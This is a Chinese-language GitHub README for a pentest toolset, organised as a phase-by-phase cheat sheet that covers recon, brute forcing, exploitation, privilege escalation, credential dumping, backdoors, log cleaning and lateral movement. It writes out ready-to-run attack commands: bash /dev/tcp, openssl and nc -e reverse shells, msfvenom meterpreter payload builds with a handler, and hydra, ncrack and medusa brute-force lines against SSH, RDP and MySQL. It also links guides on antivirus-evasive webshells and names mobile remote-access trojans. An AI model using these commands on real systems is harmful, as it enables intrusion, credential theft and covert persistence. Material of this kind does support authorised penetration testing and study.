Skip to content

Latest commit

 

History

History
435 lines (274 loc) · 9.58 KB

README.md

File metadata and controls

435 lines (274 loc) · 9.58 KB

安全测试工具集

简介

在学习和渗透测试过程中自己写的一些小脚本、小工具和一些常用字典、木马。

++++++++++分割线+++++++++++

其他工具渗透测试速查清单

前言

本文是渗透测试各阶段工具和快速用法速查笔记,将会持续更新。

站点信息收集

Google
Fofa
Shodan
Zoomeye
Goby
whatweb
Github
robtex

快速探测存活主机

ping

#!/bin/bash
for i in {1..255};
do 
 host=192.168.121.$i
 ping -c2  $host  >/dev/null
 if [ $? = 0 ]
 then    
 echo "192.168.121.$i is connected"
 else
 echo "192.168.121.$i is not connected"
 fi
done

nmap

nmap 172.18.2.1/24 -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG result.txt
nmap 172.18.2.1/24 -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oX result.xml
nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG result.txt -iL ip.txt

格式化输出存活ip,做后续详细扫描使用
https://github.com/echohun/tools/blob/master/web%E6%89%AB%E6%8F%8F/nmap_clean_data.py

-sS:使用SYN方式扫描,默认用的是-sT方式,即TCP方式,需要完成完整的三次握手,比较费时,SYN就比较快一些了;
-Pn: 禁用PING检测,这样速度快,并且可以防止有些主机无法ping通而被漏掉不扫描;
-n: 禁止DNS反向解析;
–open: 只输出检测状态为open的端口,即开放的端口;
–min-hostgroup 4:调整并行扫描组的大小;
–min-parallelism 1024:调整探测报文的并行度;
–host-timeout 30:检测超时的跳过
-T4:总共有T0-T5,貌似T4比较折中
-v:打印详细扫描过程
-oG:输出为比较人性化的格式,一条记录一行,后期好处理
-iL:载入ip段文件,批量扫,不用一条条执行了。

ipscan

快速探测端口

masscan的发包速度非常快,在windows中,它的发包速度可以达到每秒30万包;在Linux中,速度可以达到每秒160万。masscan在扫描时会随机选择目标IP,所以不会对远程的主机造成压力。
https://www.freebuf.com/sectool/112583.html

masscan 172.18.2.1 -p1-65535 --rate=10000
masscan -p80,8080-8100 10.0.0.0/8 -oL result_mas.txt --rate=10000
masscan -p80,8080-8100 10.0.0.0/8 -oX result_mas.txt --rate=10000

邮箱搜集工具

EmailSniper

子域名收集

SubDominscanner OneForAll https://www.dnsgrep.cn https://securitytrails.com

可参考 http://uuzdaisuki.com/2021/05/31/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E6%80%BB%E7%BB%93/

指纹收集

whatweb -v http://baidu.com

云悉

web目录扫描

御剑

Dirbuster

https://www.jianshu.com/p/79c7b1eda56e

webpathbrute

漏洞扫描

goby

awvs

burpsuite

nessus

xray

爆破

常见设备口令速查 http://uuzdaisuki.com/2020/11/09/%E5%B8%B8%E8%A7%81web%E7%B3%BB%E7%BB%9F%E9%BB%98%E8%AE%A4%E5%8F%A3%E4%BB%A4%E6%80%BB%E7%BB%93/

常见未授权访问利用总结 http://uuzdaisuki.com/2021/01/10/%E5%B8%B8%E8%A7%81%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/

hydra

hydra -V -l fakeroot -P top100.txt 172.18.2.177 ssh
hydra -V -l admin -P top100.txt 172.18.2.177 rdp
hydra -V -l root -P top100.txt 172.18.2.177 mysql

ncrack

ncrack -vv -d10 -user root -P top100.txt 172.18.2.177 -p ssh -g CL=10,at=3
ncrack -vv -d10 -user root -P top100.txt 172.18.2.177 -p mysql -g CL=10,at=3

medusa

medusa -v 6 -h 172.18.2.177 -u fakeroot -P top100.txt -M ssh -t 10 -O out.txt
medusa -v 6 -h 172.18.2.177 -u root -P top100.txt -M mysql -t 10 -O out.txt

漏洞利用

metasploit

burpsuite

sqlmap

xxer (xml注入利用工具) https://github.com/TheTwitchy/xxer

ysoserial (反序列化利用工具) https://github.com/frohoff/ysoserial

Struts2-Scan (struts2历史漏洞扫描和利用) https://github.com/HatBoy/Struts2-Scan

weblogicScanner (weblogic历史漏洞扫描利用) https://github.com/0xn0ne/weblogicScanner

exphub (常见web框架cve利用) https://github.com/zhzyker/exphub

cve,cms,中间件,OA系统漏洞exp合集 https://github.com/mai-lang-chai/Middleware-Vulnerability-detection

webshell

免杀webshell三篇总结请见: http://uuzdaisuki.com/2021/05/15/webshell%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6asp%E7%AF%87/ http://uuzdaisuki.com/2021/05/12/webshell%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6jsp%E7%AF%87/ http://uuzdaisuki.com/2021/05/11/webshell%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6php%E7%AF%87/

由命令执行快速寻找webshell路径并写入请见: http://uuzdaisuki.com/2021/05/20/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%86%99webshell%E6%80%BB%E7%BB%93/

菜刀

蚁剑

冰蝎

哥斯拉

普通反弹shell

bash -i >& /dev/tcp/HOST/PORT 0>&1

加密shell

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.xx.xx:4444 > /tmp/s; rm /tmp/s

nc

攻击机 nc -lvp 4444
靶机 nc -e /bin/bash xx.xx.xx.xx 4444

提权

sudo提权
http://uuzdaisuki.com/2020/02/12/linux%E5%B8%B8%E8%A7%81%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/

本地内核提权速查流程 http://uuzdaisuki.com/2021/04/12/windows%E6%8F%90%E6%9D%83%E9%80%9F%E6%9F%A5%E6%B5%81%E7%A8%8B/

提权扫描工具一览 http://uuzdaisuki.com/2021/06/09/%E6%8F%90%E6%9D%83%E6%89%AB%E6%8F%8F%E5%B7%A5%E5%85%B7%E4%B8%80%E8%A7%88/

各类exp
典型通杀:脏牛CVE-2016-5195

metasploit

cobalt strike

本地漏洞扫描工具:

windows/linux exploit suggester

powerup

accesschk

Sherlock

本地口令获取和破解

哈希提取总结: http://uuzdaisuki.com/2021/04/22/windows%E5%93%88%E5%B8%8C%E6%8F%90%E5%8F%96%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/

hash-identifier 判断哈希类型

getpass

pwdump8

Quarks-pwdump

mimikatz

Mimipenguin

Get-PassHashes.ps1

LaZagne
http://uuzdaisuki.com/2019/12/07/%E4%B8%A4%E6%AC%BE%E5%AF%86%E7%A0%81%E6%8F%90%E5%8F%96%E5%B7%A5%E5%85%B7%E7%9A%84%E9%85%8D%E7%BD%AE%E5%92%8C%E4%BD%BF%E7%94%A8/

hashcat+口令字典
http://uuzdaisuki.com/2020/07/28/%E5%93%88%E5%B8%8C%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4%E5%B7%A5%E5%85%B7hashcat/

--hash-type 0 --attack-mode 0
-m选择哈希类型
1000为windows nt hash
-a选择模式
0 Straight(字典破解)
1 Combination(组合破解)
3 Brute-force(掩码暴力破解)
6 Hybrid dict + mask(混合字典+掩码)
7 Hybrid mask + dict(混合掩码+字典)

本地信息收集

linuxprivchecker

LinEnum

后门

常见后门手法

metasploit

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f elf -o reverse_tcp_linux64
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f exe -o reverse_tcp.exe
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST xxx.xxx.xxx.xxx
set LPORT 4444
run

常用后续命令
https://www.cnblogs.com/backlion/p/9484949.html

普通shell升级meterpreter http://uuzdaisuki.com/2021/03/12/msf%E6%99%AE%E9%80%9Ashell%E5%8D%87%E7%BA%A7%E6%88%90meterpreter/

cs与msf互相转换 http://uuzdaisuki.com/2021/05/21/msf%E4%B8%8Ecs%E4%BA%92%E7%9B%B8%E8%BD%AC%E6%8D%A2/

python直连反弹shell
http://uuzdaisuki.com/2018/06/17/%E5%9F%BA%E4%BA%8Epython%E7%9A%84%E7%9B%B4%E8%BF%9Eshell%E5%92%8C%E5%8F%8D%E5%B0%84shell/ 其他语言直连反弹shell

linux后门手法总结 http://uuzdaisuki.com/2021/01/05/linux%E5%90%8E%E9%97%A8%E6%89%8B%E6%B3%95%E6%80%BB%E7%BB%93/

windows常见后门手法(这篇几年前写的,后续有时间会出一篇新的较全面的奇淫技巧)
http://uuzdaisuki.com/2018/06/18/windows%E5%B8%B8%E7%94%A8%E5%90%8E%E9%97%A8%E6%8A%80%E6%9C%AF%E5%8F%8A%E9%98%B2%E8%8C%83/

痕迹清理

痕迹清理 http://uuzdaisuki.com/2020/11/11/%E5%90%8E%E6%B8%97%E9%80%8F%E9%98%B6%E6%AE%B5%E6%B8%85%E7%90%86%E7%97%95%E8%BF%B9%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/

内网横向渗透

Hydra

nessus

metasploit

nmap

powersploit

Empire

Psnmap

lcx

ew

tunna

proxychains

FRP

N2N

票据传递: http://uuzdaisuki.com/2021/04/21/%E7%A5%A8%E6%8D%AE%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB/

内网信息收集: http://uuzdaisuki.com/2021/05/19/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E6%80%BB%E7%BB%93/

内网命令执行和文件访问

at

schtasks

telnet

sc

wmic

wmiexec.vbs

python impacket wmiexec.py

psexec

远程桌面

域渗透ipc命令执行总结 http://uuzdaisuki.com/2021/04/29/%E5%9F%9F%E6%B8%97%E9%80%8F%E4%B8%AD%E5%88%A9%E7%94%A8ipc%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%80%BB%E7%BB%93/

数据回传方式总结: http://uuzdaisuki.com/2021/01/04/%E6%95%B0%E6%8D%AE%E5%9B%9E%E4%BC%A0%E9%80%9A%E9%81%93%E6%80%BB%E7%BB%93/

arp欺骗

Cain

Arpspoof

ettercap

远控

pupy类远控

teamview

pcanywhere

radmin

手机端

DroidJack

Dendroid

SpyNote

远控免杀工具总结 http://uuzdaisuki.com/2021/05/25/%E5%87%A0%E6%AC%BE%E8%BF%9C%E6%8E%A7%E5%85%8D%E6%9D%80%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8%E6%80%BB%E7%BB%93/

典型windows-rce

ms17-010 基本通杀

cve-2019-0708 开放3389情况 windows7及之前通杀

实用工具

q-dir 文件管理工具,可开四个窗口

beyond compare 文件/文本比较工具

cmder 命令行工具

everything 文件搜索工具

navicat 数据库连接工具,支持超多种类数据库,支持导出数据,甚至提供拖库的tunnel.php等

悬剑3.0 超齐全windows工具库系统

小米范系列工具 可视化,操作简便 https://www.cnblogs.com/SEC-fsq/tag/%E6%88%91%E7%9A%84%E5%B0%8F%E5%B7%A5%E5%85%B7/